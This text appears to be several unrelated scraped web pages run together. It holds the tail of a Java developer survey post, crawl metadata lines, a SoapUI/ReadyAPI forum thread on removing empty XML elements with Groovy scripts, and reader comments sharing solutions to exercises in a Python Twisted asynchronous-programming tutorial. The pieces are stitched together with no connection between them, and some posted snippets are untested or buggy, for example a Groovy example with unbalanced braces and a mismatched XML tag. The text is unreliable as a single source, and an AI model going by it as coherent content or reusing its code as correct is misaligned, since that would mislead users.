their application anymore. It’s safe to say that the vast majority of developers nowadays need to be polyglot, fullstack or multi-lingual. As languages in many cases serve a specific goal it is obvious that developers use other languages alongside their main JVM language. This doesn’t mean you have to like the language. Some languages are considered a necessary evil fit-for-purpose. It is important to mention that multiple answers were allowed when answering this question. The results, however, are not that surprising. JavaScript is the most popular language for front end development with 62%, SQL with 44% is the most popular for querying databases, while the most popular choice for data science and machine learning applications is Python with 22% Which client-side web frameworks do you use? Participants were able to select multiple options for this question — why choose one framework when you can use them all, right? Looking at the responses, Angular looks like the clear winner with 38%. However, with so many Angular versions available, we are not certain whether newer or older versions of Angular are the winners here. React is the runner-up with 31%, closely followed by jQuery with 28%. It’s also interesting to point out that, according to our survey, 2 out of 10 developers don’t use any frameworks. Let’s see if this list changes significantly over time. !
https://snyk.io/blog/spring-dominates-the-java-ecosystem-with-60-using-it-for-their-main-applications/
CC-MAIN-2020-10
refinedweb
982
61.26
Empty Elements in XML with Data from Excel Empty Elements in XML with Data from Excel Hello community I would like to fill my rigid XML schema with data from an Excel file. Now there are test cases, where I don't need any data from the excel (Data Driven Testing | SoapUI). How can I send the schema correctly although the field is "empty"? Do I need to set some settings right? For instance: <v13:FamilyName> <v13:PrimaryValue>XXAD</v13:PrimaryValue> <!--0 to 5 repetitions:--> <v13:AlternativeSpelling> <v13:Value></v13:Value> <v13:Source> <v13:Code></v13:Code> That just proves you should make sure you read everyones posts before responding to the last. I also suggested groovy using an event handler. Unfortunately i didnt notice everyone else suggested this too! Cheers Rich @DavidSEM_Admin Sorry, I'm not back in work for another week, so I cannot dig out some examples. At work, I have pro, but at home, I don't so I don't currently have access to the pro features to help. Groovy Script steps allow you to script some action or task. They return a value. It could be true, false, 1, 0, "hello world' or even a whole payload. You could have one or several such steps in your test prior to the REST/SOAP request step. In the REST/SOAP step you can 'pull' in the results of the Groovy step(s). It's a really, really neat feature and one I use a lot. Great big caveat here, this is an untested example. There will be bugs... In terms of reading your datasource values in a Groovy Step, here is an example... // What the below does is read your DataSource and gets the value of CountryCode // for the current row and assigns it into a variable called countryCode. def countryCode = context.expand( '${DataSource#CountryCode}' ); // Initialise a var to use to return whatever we need from this script. def returnValue = ''; // Check if countryCode contains something.... if(countryCode.length > 0){ // It does! Let's put country code inside a tag. returnValue = "<someElement>" + countryCode + "</countryCode>" else { // Do nothing, there is no contry code to consider for this row. // But, you could do something. E.g shove in a default value. } // Let's return our custom part of the request. return returnValue; Then, in your REST/SOAP Request, you can pull this into the body of the request. E.g. <soapEnv:envelope> <soapEnv:header/> <soapEnv:body> <someElementInDataSource>${DataSource#CountryCode}</someElementInDataSource> ${GroovyStepName#result} </soapEnv:body> </soapEnv:envelope> In the above, it tries to show how you pull in the result of your groovy into your request. The syntax might be wrong, but what you can do is in the request window, right-click and select 'Get Data' from the context menu, that gives you access to the other steps in your test. Just select the Groovy Step and then 'result' from the pop-out menus and SoapUI will insert the command for you. I saw the solution with a Groovy script and I tried it and it somehow did not work. If it helps i can provde the XML and the ExcelFile with the Data and the Script i found on the web. Maybe it is a simple mistake from my side. However, i am not very familiar with scripts and the groovy language (or any programming language). I also use SoapUI pro wîth ReadyAPI 3.3.1 This would be the XML Request: > ------------------------------------ This would be the ExcelSheet where the Data is taken: ------------------------------------ This is the groovy Script i found: def groovyUtils = new com.eviware.soapui.support.GroovyUtils( context ) def stepName = context.getCurrentStep().getLabel() def holder = groovyUtils.getXmlHolder( stepName + "#Request") // Find nodes that only consist of whitespaces. for( item in holder.getDomNodes( "//*[normalize-space(.) = '' and count(*) = 0]" )){ item.parent().removeXobj() } // Update the request and write the updated request back to the test step. holder.updateProperty() context.requestContent = holder.xml I have implemented it under "projects>events>"projectRunListener.beforeRun" and "RequestFilter.filterRequest. Sorry again for my little knowledge.. Thank you guys Hi, Based on the few nodes you have in your request, I wouldn't use the script you have below, I'd create it on the fly. I'm assuming your test looks something like.... - Datasource Step - SOAP Request Step - Datasource Loop My two cents, clone the test you have so far to create a new one. That way, if my suggestion doesn't help, you've not lost anything. In the cloned copy of the test, insert a new Groovy step so test looks like... - Datasource Step - Groovy Script - SOAP Request Step - Datasource Loop Don't forget to update the Datasource Loop to go to the Groovy script instead of the SOAP Request. The idea here is that for each row in the datasource, we're going to build the body of the request in the Groovy Script. Then when SoapUI reaches the SOAP Request Step, it will 'pull' the body for this request from the groovy step. Also, clear out that code to strip empty nodes from the SOAP Request step. In the SOAP Request Step, you'll have the whole body in the request pane, which as posted above contains... > Delete the nodes from this so it looks something like.... <v1:Request> <Document> ${Groovy Step#result} </Document> </v1:Request> The bit ${Groovy Step#result} calls the Groovy script and replaces ${Groovy Step#result} with the result from script. Bit like a placeholder. Here's the grind.... Edit the Groovy Step and start adding checks for each node... // Initialise the variable we're going to add our nodes into. def returnString = ''; // Start with the first element FamilyName... // Get family name from the datasource... def familyName = ${TestData_DataEntry#FamilyName}; if (familyName.length() > 0) { // There is a family name in this datasource row. Let's use it. returnString = returnString + "<v13:FamilyName><v13:PrimaryValue>" + familyName + "</v13:PrimaryValue></v13:FamilyName>"; } // FirstName Element check... def firstName = ${TestData_DataEntry#FirstName}; if (firstName.length() > 0) { returnString = returnString + "<v13:FirstName>" + "<v13:PrimaryValue>" + firstName + "</v13:PrimaryValue></v13:FirstName>"; } // And so on and so on until you checked each element... // Finally, return what we have put together... return returnString; Hopefully, that should then provide you with a request that is dynamic and doesn't contain any empty nodes. Dear @ChrisAdams Thank you very much for your reply and your help. Actually this was only e part of the nodes of my request. A full request is actually much longer but i thought by showing only partly of the nodes would help to show my current "test setting" and issue. So in this case if I build the whole body with groovy script, this would take too much time, because I have 200 different requests.. Another idea i had was to have something that deletes all empty nodes when the data are loaded from the excel, before the request will be send. But i don't know if this is possible.. Hi, Sorry, I thought that was pretty much the request. If you have so many nodes (200?), then building a script to check each node in the way I described would be too much work. I don't know how easy it would be to make a working script to remove the empty/redundant nodes. Maybe someone else can help with that. Chris If youre running ReadyAPI!, you could create an event handler to strip out the empty elements after the data has been extracted from your source but before its injected via your REST request, so you wouldnt have to build the xml using groovy. For the event handler groovy youd just need to identify the xpath of the attributes you want stripped. Ta Rich Thank you for your answer. Could you explain a little more about your idea with the event handler? I am using ReadyAPI 3.3.1. I did an event handler with the mentioned script in my previous messages in this topic. I did an event "RequestFilter.filterRequest" and it didn't work. What went wrong? This was the script: def groovyUtils = new com.eviware.soapui.support.GroovyUtils( context ) def stepName = context.getCurrentStep().getLabel() def holder = groovyUtils.getXmlHolder(stepName + "#Request") for( item in holder.getDomNodes( "//*[. = '']" )){ holder.removeDomNodes("//"+item.nodeName) } - -
https://community.smartbear.com/t5/SoapUI-Open-Source-Questions/Empty-Elements-in-XML-with-Data-from-Excel/td-p/211527/page/2
CC-MAIN-2022-40
refinedweb
1,366
67.04
The game I'm working on uses an illustration art style with lots of thin, detailed lineart created in vector graphics tools. It looks fantastic on very high resolution displays, but at low resolutions, when the camera zooms out, the lines start flickering or disappearing when objects move around, which makes the game look ugly. How can I prevent this from happening? I've created a simple test scene with a circle containing very thin perpendicular lines to demonstrate the issue. This is the 256x256px texture I'm using as a test: Texture import settings: Texture Type: Sprite (2D\uGUI) Sprite Mode: Single Pixels To Units: 100 Filter Mode: Bilinear Max Size: 1024 Format: Truecolor Here is a portion of a 1024x768px screen with two circles next to each other. The orthographic camera has a size of 30. This is what I would expect from point filtering on textures, but it is set to Bilinear. Is this a bug in Unity, or is there something happening that I don't understand? After trying various strategies for eliminating the flickering and making the lines crisper, I found a script on the oculus forums (☆t=20) that implements supersampling by rendering the scene to a render texture twice the size of the screen and displaying that in a new camera that culls everything else. The result (above) is much better, but is still quite blurry because of the bilinear filtering on the render texture. Switching it to point filtering produces results identical to the original image. Why does supersampling help in this case (since the circle textures are set to Bilinear filtering already)? If supersampling is really the best way of tackling this problem, what is the best way to downsample the large render texture using a different algorithm (not bilinear filtering)? The camera that renders the large render texture has the script using UnityEngine; using System.Collections; public class TextureRenderCamera : MonoBehaviour { public RenderTexture CameraRenderTexture; void OnRenderImage (RenderTexture source, RenderTexture destination) { // Just draw the texture Graphics.Blit (CameraRenderTexture, destination); } } Can I change Graphics.Blit (CameraRenderTexture, destination); to Graphics.Blit (CameraRenderTexture, destination,mat); where mat would have a custom fragment shader (possibly based on) applied to it? I've never dealt with shaders before, so I don't understand the pipeline yet. Graphics.Blit (CameraRenderTexture, destination); Graphics.Blit (CameraRenderTexture, destination,mat); Answer by Owen-Reynolds · Jun 20, 2014 at 01:43 PM That's just the way graphics work. a 256x256 image will always look blurry when blown up, and high-contrast areas will always be choppy when shrunk. The standard solution is to limit the zoom. Another is to use multiple "LOD" images. Say those two lines are 5 pixels wide (including the "fade into blue" pixels. When it gets shrunk, they become less than a pixel wide, and parts of the line drop out. Rotating and moving recalculates the math, and single pixels drop in and out. One way or another, vector graphics, super-sampling ... all any solution can do is thicken that line as the image gets smaller (thicken in the full-sized image, or not shrink as much as it should in actual size. Depends how you want to think of it.) I feel like super-sampling isn't the solution at all, and just happens to always make the lines wider. I've never done this, but in theory you can hand-make the mip-maps and install them yourself. Not sure Unity allows that. So you can draw one that looks good at 32x32, 64x64 ... full screen (that would be the original.) And the graphics card will automatically pick the nearest size and perform blending. A hack version of that would be to simply switch out images based on zoom. But that would snap (which might not look so bad.) Most of that's true, and I considered doing custom 2D LOD, possibly blending between atlases at runtime, and that sounds like a lot of extra work plus a ballooning of executable size. Supersampling is an improvement because it doesn't require more assets and looks better than nearest neighbor downsampling. All of the 2D art approaches I've seen (excluding pixel art) work from very large images that get downsampled by the engine. High contrast areas in images don't have to be choppy when shrunk down - what pixels are preserved and how depends on the scaling algorithm. shows an example of scaling down using bilinear interpolation - no choppiness in sight. The same is true for the game Rayman Legends, where the artists work from 4K atlases or greater, but Rayman appears a few cm tall in game and still looks great (including the eyes, which are very high contrast with fine black pupils). Rayman at the largest and smallest game resolution. Zoom in to see little Rayman's eyes. Why does Unity resort to nearest-neighbor downscaling for images marked as bilinear? Is there a way to change this behavior? AFAIK, Unity just uses the standard graphic card features. Bilinear filtering, for any size, unless you specify Point (which I think is also known as Nearest Neighbor.) Those top two circles do seem to have snapped to Point filtering, which has never happened for me. That paper seems like from the days when it was still practical to do graphics on the CPU. I misspoke about high-contast. Thin high-constrast features give me the only trouble. Sharp lines are the absolute worst. Filtering on shrunk images just fades them out. I think an actual game artist might know more about known problem textures. I'd suspect Rayman's pupils may be drawn separately. But, as you note, a large sharp circle will generally shrink down just fine (until it becomes less than a pixel.) Answer by Jaroslav-Stehlik · Jul 14, 2015 at 07:00 Size To Make Art Assets? 1 Answer Android optimal texture/sprite size, 2048 or 512? 0 Answers Is there any way for a Sprite Renderer to use mipmaps? 1 Answer Multi-resolution!!! Sprite and GUI 1 Answer Problems assigning sprite's images 1 Answer
https://answers.unity.com/questions/731249/preserving-fine-line-art-variable-zoom-and-resolut.html?sort=oldest
CC-MAIN-2019-35
refinedweb
1,014
64.51
Step 1: Open a Project Step 2: Enable Expert Robot Configuration Step 3: Accept Terms of Expert Robot Configuration Step 4: Include New File - Right click on the ‘include’ dropdown and select “New File.” Step 5: Add Vision Sensor Configuration File - Select the ‘Vision Sensor Configuration(.h)’ C++ file. - Assign the Vision Sensor to a port. - Name the file [name of file].h - Click the Create button. NOTE: The file name MUST contain the correct extension of “.h”, the file cannot be created without it. Step 6: Launch the Vision Utility - Click on the newly created Vision Sensor File to open the file. - Click on the Configure button to launch the vision utility. Step 7: Place an Object in View - Place an object in front of the Vision sensor so that it takes up most of the screen and click on the 'Freeze' button to lock the screen. Step 8: Select the Object's Color - Click and drag a bounding box on the color/object to be tracked. Make sure to have the bounding box contain mainly the color of the object and not little to none of the background. Step 9: Assign the Color - Click on one of the seven 'Set' checkboxes to assign that color to a signature slot. Step 10: Calibrate the Color Signature - Click on the double-sided arrow icon to the right of the 'Clear' button and use the slider to calibrate the Vision Sensor to best detect the color signature. For best results, drag the slider until most of the colored object is highlighted while the background and other objects are not. Step 11: Name the Signature - Click on the SIG_1 text field in order to rename the color signature. - Press the Freeze button once more to allow the Vision Sensor to resume tracking. Move the colored object within the field of view of the Vision Sensor to ensure that it is being tracked. If the tracking is working as intended, close out of the Vision Utility. - The color signatures can also be changed in the text editor via the Vision Sensor Configuration file. - To configure the Vision Sensor to detect more colors, repeat steps 5-9. NOTE: The Vision Sensor is sensitive to different levels of light. The color signatures might need to be re-calibrated if the levels of light in the robot's environment change. Step 12: Open main.cpp - Click main.ccp to open the file. Step 13: Modify main.cpp - Type out #include "[name of Vision Sensor file].h".
https://kb.vex.com/hc/en-us/articles/360035954951-Vision-Sensor-Expert-Robot-Configuration-Robot-Config-VEXcode-Pro-V5
CC-MAIN-2020-34
refinedweb
420
65.62
Archived:Take a photo at regular intervals. Here is a code that will help to take photos from a camera at regular intervals.This interval can be set as required by the developer. import e32, camera path = "c:\\tmp.jpg" def capture(): img = camera.take_photo() img.save( path ) d = 0 while True: print "Wait" e32.ao_sleep(3) capture() print "Photo %d saved\n" %(d) d+=1 print "Session Ended" The loop in the code is a forever loop.This loop can be modified according to the condition required by the developer. The above code clicks a new image from the camera at a regular interval of 3 seconds. This interval can also be modified by changing the argument in the statement e32.ao_sleep(3) Which is a delay introduced. Also It can be observed that the images are saved with the same name with the above code. Also provision can be made to save the images with different name.There are several formats for naming. One such format is to save the image with the date in the file name.The following code an be used for the same. from time import ctime your_path="C:\\image " def capture(): img = camera.take_photo() img.save( your_path + ctime + ".jpg") #this saves the picture in jpg format with a date in the filename Both the codes can be appropriately combined to have the required code to capture photos from the camera at regular intervals and to save them to a desired location with the desired different file name.
http://developer.nokia.com/community/wiki/Take_a_photo_at_regular_intervals
CC-MAIN-2014-10
refinedweb
254
67.35
. 90 thoughts on “An Introduction to Asynchronous Programming and Twisted” in the countdown app you are doing import the reactor twice. I don’t think that’s neccesary, the code runs fine without the one in line 7. Hey Luis, that’s a good point, there’s no actual need for the inline import. I’m going to go ahead and leave it, though. Since most reactor imports are done inline, it’s still a good example of typical usage, I think. Hi, this is a very good introduction to Twisted + callbacks. I did your suggested exercises and learned more. Thanks. You’re welcome. Thanks for the intro. Maybe a dumb question here, after I install a reactor will subsequent imports of reactor from twisted internet still use my installed reactor? They will, yes. I was wondering about the same thing and doing line 6 confused me quite a bit. Doing further investigating reveals that it’s not needed. So I’d suggest removing that from the code altogether. It confused me, at least Fair enough, I will take it out. Me again Any idea why this, when trying to run basic-twisted/simple-poll.py: File “/System/Library/Frameworks/Python.framework/Versions/2.6/Extras/lib/python/twisted/internet/pollreactor.py”, line 19, in from select import error as SelectError, poll Been beating my head against it for quite a while now. Do pardon whatever obvious thing I’m undoubtedly missing (or operator error, more likely). Hilarious: I can’t even report the problem correctly. Here’s what I was actually wondering about: “ImportError: cannot import name poll” Where is ‘select’ supposed to be found? The error message seems to imply that ‘error’ itself has been imported correctly, but that ‘poll’ can’t be located, yes? Any insights greatly appreciated. Hm, it may be that poll() is not available on Mac OS. I’ll check when I get home later. But it’s safe to skip over that one for now Hey Mark, I’m pretty sure poll just isn’t available on Mac OS. I updated the text to indicate that possibility. Hi Dave! I’m trying to complete suggested exercise #2(LoopingCall), it’s working ok, but did i understand right the way how i should implement that? Many thanks for any thoughts. Looks like the right track to me! I think it can be simplified a bit, see my comment here: Thanks for this wonderful tutorial, Dave! You’re a wonderful teacher. Just wanted to share my approach for the second question, since I’m quite proud of it Thanks again! Thank you, and nice solution! Hello Felipe, I didn’t succeed to run your solution without changing line 10 : print “LoopCall # {} down to {}”.format(index, counters[index]) by print “LoopCall # {0} down to {1}”.format(index, counters[index]) copy/paste problem ? regards probably python versions. If I recall correctly, in 2.6 and earlier, you have to explicitly specify your var indices. My guess is Felipe is using 2.7 or higher… Hi, Dave! I’ve really been enjoying your tutorial – your teaching style is both clear *and* entertaining. Thanks for the time you put in! Here’s my exercise #2 solution: Win? Glad you like the series! I think you’ve got yourself a a solution there, nicely done. I do think it would be better to avoid sub-classing LoopingCall. How would you do that? But that’s my favorite part! Fair enough Hey Dave, I’m quite new to Twisted Programming, and I have a question regarding the NotRestartable thingy: what if the sockets and factories the SelectReactor shall deal with, change during runtime? Say, an IP address changed, or – in my case – you got seperate modules for each Protocol which are not known at the moment the reactor.run()s ? As you cannot restart the reactor, I see the following options: – Change to poll reactor to have one reactor for each Protocol: not possible in my case (Mac OSX) – Change Program Architecture to start Reactor after sockets are known Are there any further options? Cheers THIMC, there’s a discussion on the mailing list about that: Hey Fabian, I didn’t have time to respond to your post yesterday. The short answer is that it’s definitely possible, just do those same calls to connect to a port while your program is running rather than on startup. But now that you have the question out on the Twisted mailing list, you should get some detailed answers. The trick is to make an initial connection. I just did an initial reactor.run() and somewhen later made the first reactor.connectTCP() – it just got stuck then. It’ll work if you provide the reactor with a connectTCP() to some kind of Fake Protocol BEFORE calling reactor.run() Interesting solution You can always call reactor.connectTCP after the reactor starts and you don’t need to call it even once before it does so. However, you will need to arrange for some callback to be invoked when you are ready to make the connection. Consider the reactor.callLater() function, for example. Here’s mine ;D Looking good, but I think it stops as soon as any one of the counters finishes, instead of after the last one. Here’s my solution for #1. I don’t really believe this is the best approach but since the counters have to communicate somehow between each other in order to decide when to call reactor.stop() the only solution I managed to come up with was global variables. I would greatly appreciate if someone could give me a hint on how this could could be solved in a better way. P.S.: I’m not a native speaker, so excuse me for any mistakes I could have made Your solution certainly works! And your English is very good, don’t worry. To get rid of the global variable, you could pass a shared object to each of the counters and have them invoke a method on it when the counter is done. And then that separate object could be in charge of shutting down the reactor instead of the counters. You could even just pass a reference to the method itself, as a ‘callback’, which is kind of looking forward to the next parts. Hi, Thank you for the awesome tutorial. Here is my solution for Exercise 2: Learned a lot by doing this! I recommend that everyone do the exercises. Nicely done, and you are welcome! I did have one question, Out of curiosity, I commented out the line that did stopped the looping call. The code still worked. I suspected this was a bad idea, but why? It still printed out the right things because of that ‘ if self.counter:‘ guard in your count()method. Although the loops keep running after they reach zero, they don’t print anything out. And when you stop the reactor it doesn’t wait for LoopingCalls(which are implemented using reactor.callLater()). But it’s still much better to stop those loops when you don’t need them. They will take up some CPU because they keep looping, and if you accumulate a lot of them then that will add up. Oh of course! Thank ye kindly Very well explained . I am new to python and having some problem in exercise : this is link to my solution of exercise1 : this is giving some errors, please give it a look!!(i m sure i m not using select.select() correctly ) I was looking at solution of Narada , . It is looking sync to me . I mean where is outer loop which keep care of which counter to run which time (which is not blocked). I know these are silly things to ask and not worthy of your time ,but i have tried myself to understand and no success. Hoping your explanation will help me to understand later parts in better way. Hi Amit, in Part 3 you don’t need the outer loop because the Twisted reactor provides that loop for you — the loop starts when you call reactor.run() and that function doesn’t return until the loop finally stops. So there is no need for your own loop (and no need for a select() call since there are no sockets to listen on). Does that make sense? dave Hi Dave! Thanks for tutorial, I really like the way you explain. One question I have is, how does Twisted benefits from smaller tasks (callbacks)? Would it make any difference for one single request, if I do say 100 smaller callbacks instead of 10 bigger? In the end, its the same amount of work. And those callbacks do they work actually blocking the reactor for a small period of time, right? Yes, you are right that it is about the same amount of work (the 100 requests do have the extra function call overhead). And while a callback (any callback) is running, the reactor cannot service any other requests. If your server only ever handles one request at a time, then it wouldn’t make any difference. Of course, if your server only handles one request at a time, then there’s no real reason to use the asynchronous model either. Thanks for the tuto! I’m enjoying very much! Here mine Anybody has a solution without globals??? I cant find it. Yes….it has a very big problem with the names…;) Glad you liked the tutorial. Could you pass the Control object to each instance of Countdown instead of using global? I love how you explicitly point out things like “when our callbacks are running, the Twisted loop is not running”! It really helps Hi Dave, Thanks for the tutorial. I’m new to python and async. I’m getting some errors in my attempt at exercise 1. My thoughts were to pass in a separate object that would store a dictionary of the different counters and their respective counts and would check for when the counters all were down to zero. However, I think that my class is running outside the reactor as any debugging print statements happen before the reactor start message. I think that this is the root of my issues. My ‘complete’ method is tossing errors that I don’t understand. Any insight you could offer would be a great assistance! Thanks! Hey Seth, welcome to Python! The reason why you have some code running before the reactor starts is because the calls to .count() in callWhenRunning are happening before you call callWhenRunning. The argument to callWhenRunning should be a function reference (the function you want to call when the reactor is running), plus whatever arguments you want to pass to that function when it is actually called. So you need something like: reactor.callWhenRunning(Countdown().count, groupCounter) Does that make sense? Since you are new to Python, I have implemented a version of your idea in a bit more of a ‘Pythonic way’ here, if you interested, but feel free to figure it out on your own first if you like. Dave, Excellent! That makes complete sense. By looking at the documentation, apparently, passing group_counter (lines 50-52 in your re-write of my code) is available in def count (line 28) by being the second parameter in callWhenRunning. Thanks a ton! Thanks for the tutorial. I’ve done some asyn sockets in C, but was struggling to wrap my head around the programming model of twisted. Here’s my code for exercise 2.: Nicely done! Hi Dave, I’m having trouble with exercise #1. You did refer to it in another reply, but it doesn’t show up. Can you repeat it or provide a new link? Your tutorial is fantastic — very well written and even fun to read. Thanks, dave I found the (a) solution: #!/usr/bin/env python class Countdown(object): number_running = 0 def __init__(self, max): self.max_count = max self.counter = self.max_count Countdown.number_running += 1 def count_down(self): if self.counter == 0: Countdown.number_running -= 1 if Countdown.number_running == 0: reactor.stop() else: print self.counter, ‘…’ self.counter -= 1 reactor.callLater(1, self.count_down) from twisted.internet import reactor counter1 = Countdown(5) counter2 = Countdown(10) counter3 = Countdown(15) reactor.callWhenRunning(counter1.count_down) reactor.callWhenRunning(counter2.count_down) reactor.callWhenRunning(counter3.count_down) print ‘Start!’ reactor.run() print ‘Stop!’ Nicely done! Glad you are liking the tutorial. Hi Dave, I used your solution as a springboard to my own but I think your solution only works if you have the same delay for each counter. The exercise asked us to have a variable delay and if you follow your code it doesn’t work. What I did was to move the if block dealing with the reactor stop below the original “if else” block to deal with this. No doubt my code can be massively improved, but here’s my solution that allows for both variable delay, and number of counts. class Countdown(object): number_of_counters = 0 def __init__(self, name=”Countdown”, delay=1, counter=5): self.delay = delay self.counter = counter self.name = name Countdown.number_of_counters +=1 def count(self): if self.counter == 0: print ‘A task (%s) has completed’ % (self.name,) Countdown.number_of_counters -= 1 else: print self.name, self.counter, ‘…’ self.counter -= 1 reactor.callLater(self.delay, self.count) if Countdown.number_of_counters == 0: print ‘Stop the reactor’ reactor.stop() from twisted.internet import reactor reactor.callWhenRunning(Countdown(“Counter 1″,3,3).count) reactor.callWhenRunning(Countdown(“Counter 2″,1,3).count) reactor.callWhenRunning(Countdown().count print ‘Start!’ reactor.run() print ‘Stop!’ And the output is as follows: Start! Counter 1 3 … Counter 2 3 … Countdown 5 … Counter 2 2 … Countdown 4 … Counter 2 1 … Countdown 3 … Counter 1 2 … A task (Counter 2) has completed Countdown 2 … Countdown 1 … A task (Countdown) has completed Counter 1 1 … A task (Counter 1) has completed Stop the reactor Stop! Hi Dave I tried your code above and it didn’t work for me. I don’t know the exact reason but what I am guessing is that you have created 3 different objects of the class Countdown so all 3 objects are diff and have no relation/way to communicate between them to see if all the counters have finished or not. Please correct me if I am wrong. PS: I am very new to python please pardon if something is wrong with my understanding. Hi Bhaarat, I looked at the other Dave’s code (The one with a capital D is a different Dave than me) and it looks to me like it should eventually stop. The reason is that the number_running variable is a class-level variable (it is accessed via Countdown, not via self) and so it is shared between all instances of the class. Note it does not have a variable delay as Steve pointed out. I forgot I put that part into the exercise! Hi dave thanks for the reply and I get the point, actually I realized this concept soon after posting the doubt but I thought let it get confirmed by others too :). Anyways article is awesome. random question here on python, in the following code why is it reactor.callWhenRunning(stack) and NOT reactor.callWhenRunning(stack())… what is the difference in meaning between the two? def stack(): print ‘The python stack:’ traceback.print_stack() from twisted.internet import reactor reactor.callWhenRunning(stack) Hey Daniel, it’s the difference between a function call and a function reference. Consider the following from the interactive interpreter: >>> import time >>> print time.time <built-in function time> >>> print time.time() 1349323851.11 The first print shows the time.timefunction and the second the result of calling that same function. Now the callWhenRunningmethod expects a function reference and it will arrange for the reactor to call that function (using the reference) when the reactor starts. If we say: reactor.callWhenRunning(function_name) Then we are passing a function reference the reactor can use to call the function later by using the () operator. But if we say: reactor.callWhenRunning(function_name()) Then Python will first call function_name and then it will call callWhenRunning with the result of the first function call as the first argument. Whew! Does that make sense? I believe that the “selectreactor” is no longer the deafult reactor. IIUC, “epollreactor” is now the default reactor (at least on linux). Good point, I have updated the text to make it more general. Sorry… IIUC = “If I Understand Correctly” Many thanks for this lovely series! I’m new to Twisted and was unfamiliar with asynchronous programming terminology, so this has been a great help. I’ve been imagining a “reactor” as the thing keeping the program moving forward, perhaps by spitting out callbacks something like how a nuclear reactor spits out neutrons. While I still like the image, I suspect your account makes more sense… Here are my solutions for the exercises: #1: #2: I actually came up with the two different approaches as solutions for #1, and then altered one of them to use LoopingCall. Is my sense that #2 (with or without LoopingCall) seems more “Twisted flavored” correct? And is the instinct (also in #2) to remove the call to reactor.stop from other callbacks, a good one (even if unnecessary here)? You are welcome! I quite like the imagery of a Twisted reactor firing out callbacks like a nuclear reactor firing off neutrons. And since the Twisted reactor really is driving the whole show, I think it definitely works well as a metaphor. Using LoopingCall would probably be what most Twisted developers would use because, well, it’s already there Your instinct to move the reactor.stop call from the Countdown object is definitely a good one. Few objects will need to call reactor.stop and it doesn’t make much sense in the Countdown object. I like the second solution better because the Countdown objects are actually performing the counting themselves, whereas in the first solution they are really just data structures. In the second solution the counters have to know about the monitors and vice-versa. Is there a way you could make the Countdown objects agnostic towards them? In writing the two solutions, I was thinking mostly of the difference between the first and second solutions as being how coordination was organized, i.e. between having the callbacks go to the aggregate pool vs going to the individual countdown objects. While I did notice that by the time I was done the Countdowns in #1 were stripped down almost to being structs, I chalked that up to this being a toy example. Though of course facilities like LoopingCall are the reason for using Twisted in the first place, the point of my aside was that even without LoopingCall, the organization of #2 would still be more suggestive of Twisted thinking — which you appear to agree with. Indeed, your suggestion of what to do further here seems to continue the process of separating the components: not only does the monitor not get to control the countdowns, they don’t even need to send it status messages. So far, the only strategy I’ve come up with that actually leaves the Countdowns blissfully oblivious of what’s going on around them is to have the monitor object poll them to see if they’ve finished. Like this: #3 (The pasted version has (at least) two bugs, that don’t have any effect here: monitor.__init__ doesn’t set the rate attribute to the function argument, and monitor.poll fails to call self.looper.stop) Is that what you were getting at? It works, but I don’t have a very intuitive sense of whether it’s a good way to do this. Thanks for taking the time to look at my code. That’s definitely what I was getting at, but getting closer to the “Twisted” way of doing that would be to have the Countdown objects accept a generic callback parameter which is invoked when the count is done, i.e., don’t assume the thing on the other end is a countdown monitor with a ‘finalize’ method, just give whatever it might be a mechanism to find out when the count is finished. You could have countdown objects accept a ‘callback’ parameter that will be called with no arguments when the count is over. Then the monitor can pass something like lambda : self.finalize(ctdn) as the callback. Make sense? Eventually you will see that the fully “Twisted” way of doing this would be for the Countdown objects to provide a Deferred object, but that’s looking ahead. It seems there was one point I misunderstood in writing #3. My design goal there was that the Countdown objects were inward turned — an object like the monitor could examine what they were doing, but beyond a start signal, they accepted no outside information after construction, and called no other objects. I suppose I can say that this was at least asynchronous, but I’m not sure it could be called an asynchronous network… So here we go, a version in which the Countdown objects are very bad airline passengers that accept callbacks in brown paper wrappers from random passersby: #4: Also, now the monitor will track any object with a setCallback method. This feels a bit unspecific since there are events other than completion of a process that should trigger callbacks. Maybe it should be something like callWhenFinished? One rather arbitrary design goal I have used in all the versions is to store the startTime in only one place. This means I’m always trying to solve the problem of where and how each endTime should be generated. I included a commented out line that suggests how a timestamp could be passed back when the callback is triggered. Given that these callbacks triggered by a process completing, it doesn’t seem entirely out of place to send a timestamp. Though, now I think of it, I suppose the endTime argument could be made optional with a default. Are these the kinds of issues solved by Deferred objects? I find it useful to work through things on a low level like this. Thanks again for your help and patience here. Yes, that’s the sort of thing I had in mind. And callWhenFinished seems like a better name to me to. Deferreds solve the ‘managing callbacks’ problem so that each and every class like Countdown doesn’t have to manage its own set of callbacks. With the full complement of Deferreds and their helper classes, you would be able to dispense with the monitor class entirely. Implementing this stuff yourself first is a great way to understand why things are the way they are in a framework like Twisted. In one of the above comments I saw this fragment of code : from twisted.internet import reactor counter1 = Countdown(5) counter2 = Countdown(10) counter3 = Countdown(15) reactor.callWhenRunning(counter1.count_down) reactor.callWhenRunning(counter2.count_down) reactor.callWhenRunning(counter3.count_down) I’d like to ask that are all the 3 callWhenRunning() function calls asynchronous? Or does the second call wait for the first one to complete. Pardon me if this is a basic question. I seem to have some difficulty in understanding the callbacks. Hi, the callWhenRunning method is a bit special, because it is either synchronous or asynchronous depending on whether the reactor is actually running. If the reactor is running at the time you make the call, it just runs the function right away, it’s like you just called the function yourself. But if the reactor is not running, then the reactor schedules the function to be run once the reactor actually starts up. In the code fragment you saw, callWhenRunning is being called before the reactor is running (before the call to reactor.run()) so it is asynchronous. Does that make sense? If that’s asynchronous then in that case, shouldn’t the code give a slightly different output each time? Or at least there’s a chance of obtaining a different output? Please correct me if I am wrong. I’m not sure if Twisted guarantees if the scheduled calls to callWhenRunning will be called in order. Of course, if those functions themselves launch asynchronous operations, then in general you cannot expect a particular order of asynchronous operations. However, because of the contrived nature of this example, you may never see different output. All three calls are executing the same code and that code is simply calling reactor.callLater, rather than performing network communication or communicating with a separate processes. Yes. This clears up the cloud of confusion. Thanks! Thoroughly enjoying this! Thanks dave You are welcome, glad you like it! thanks dave nice article You are welcome, thank you! Hi Dave, Thanks for your great series. I have followed your discussion with Plover above and finally worked the solution to exercise#2 as following: My basic idea is to set a manager to handle both the job of monitoring and managing of LoopingCall object. In this way, the client code can focus on its main task and only need to call the finalize method to tell the manager the job is done. Secondly, I want to make the manager a common manager of all kinds of tasks; thus the client must implant a interface with two method, Name() and Job(), to let the manager aware of its property without bound to it. I do not know whether this is a good idea or not. Or could you please give me some indication to further directions to craft this task? Having a task manager seems like a nice abstraction here. I think you could avoid the finalizecallback by having a method on the job for asking if it is done. In terms of Python style, Name()and Job()look more like Java idioms. I would just access .namedirectly and have a get_jobmethod. Also, 